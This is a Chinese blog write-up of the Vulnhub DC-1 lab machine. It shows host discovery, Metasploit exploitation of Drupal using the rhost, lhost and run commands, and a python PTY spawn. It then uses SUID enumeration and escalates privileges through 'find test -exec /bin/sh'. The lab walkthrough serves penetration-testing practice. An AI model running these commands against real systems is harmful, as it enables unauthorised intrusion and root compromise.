zoukankan      html  css  js  c++  java
  • Vulnhub DC1

    靶机简介

    DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它是为初学者设计的一个挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。总共有五个flag,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。

    前言

    以前打过的靶机,现在再回去重新回味一遍,不看wp磨一磨性子。五个flag,每个flag都会提供线索,但是我的最终目的是拿到root权限,所以不一定找到五个flag,如果可以的话直接拿root。如果不行的话就跟着flag走吧。

    getshell

    netdiscover 发现主机ip

    nmap扫一扫

    访问其80端口,发现了 Powered by Drupal

    百度一下Drupal漏洞(太多了)

    先用msf打一打

    msfconsole
    search Drupal
    

    利用最新的 2019-02-20试一下

    use 6
    set rhost 192.168.146.128
    set lhost 192.168.146.129
    run
    

    失败了 ,msf残忍的告诉我

    Exploit completed, but no session was created.

    再尝试一下 2018-03-28那个洞,成功拿到shell

    SUID提权

    用python模拟一终端

    python -c 'import pty;pty.spawn("/bin/sh")'

    找到正在系统上运行的所有SUID可执行文件

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} ;
    

    使用第一条就行了

    发现find命令,利用find提权

    find提权

    简介

    find命令是在指定目录下查找文件,并返回查找到的子目录和全部文件
      -exec<执行指令>:假设find指令的回传值为True,就执行该指令 #如果find有suid权限,那就可以通过find执行任意root命令
    

    利用

    直接在/tmp目录下创建个文件,然后用find找,自然会返回true。再利用-exec参数执行命令即可

    cd /tmp
    touch test
    find test -exec "/bin/sh" ;
    

  • 相关阅读:
    Hadoop开发周期(一):基础环境安装
    Laravel5中使用阿里大于(鱼)发送短信验证码
    整理关于web项目如何防止CSRF和XSS攻击的方法
    TP5.0 excel 导入导出
    eoLinker_业内领先的api管理平台
    ImageIcon读取文件 规格严格
    JPDA Trace好不容易找到的 规格严格
    FileLocker 规格严格
    debugging information corrupt; recompile module 规格严格
    Windows架设FTP 规格严格
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13829484.html
Copyright © 2011-2022 走看看